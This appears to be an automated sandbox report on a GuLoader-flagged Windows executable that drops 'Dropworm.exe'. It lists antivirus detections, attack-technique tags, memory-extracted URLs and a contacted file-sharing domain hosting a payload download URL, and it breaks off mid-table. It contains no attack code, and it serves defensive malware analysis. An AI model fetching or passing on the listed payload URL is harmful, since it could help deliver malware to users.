            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            2Jq4fZJIJ8.exe65%VirustotalBrowse
            2Jq4fZJIJ8.exe53%ReversingLabsWin32.Trojan.GuLoader
            2Jq4fZJIJ8.exe100%AviraHEUR/AGEN.1361137

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe100%AviraHEUR/AGEN.1361137
            C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe53%ReversingLabsWin32.Trojan.GuLoader
            C:\Users\user\AppData\Local\Temp\nseAD0E.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsmE7DA.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://ocsp.starfieldtechZ0%Avira URL Cloudsafe
            http://crl.starfi0%Avira URL Cloudsafe
            https://www.opendrive.com0%Avira URL Cloudsafe
            http://ocsp.starz0%Avira URL Cloudsafe
            http://crl.starfieldte0%Avira URL Cloudsafe
            http://crl.starfieldtex0%Avira URL Cloudsafe
            http://ocsp.star0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            od.lk
            		38.108.185.115
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binfalse
                		high
                https://od.lk/f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension.false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://web.opendrive.com/api/branding.json?user_id=21043372Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binmDropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://certs.starfieldtech.com/repository/02Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://certificates.starfieldtech.com/repository/02Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://ocsp.starfieldtechZDropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binqDropworm.exe, 0000000C.00000002.2433018640.0000000003387000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binr2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033A3000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033A3000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binsDropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://od.lk/or/2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://web.opendrive.com/api/file/info.json/MzdfMzIxNzQ4MzhfWGo3SW8?sharing_id=2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.starfieldtech.com/sfig2s1-775.crl0c2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://ocsp.starfieldtech.com/082Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://od.lk/lDropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.opendrive.com2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://ocsp.starfieldtech.com/0;2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://web.opendrive.com/api/2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://od.lk/o2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://ocsp.starfieldtech.com/0F2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.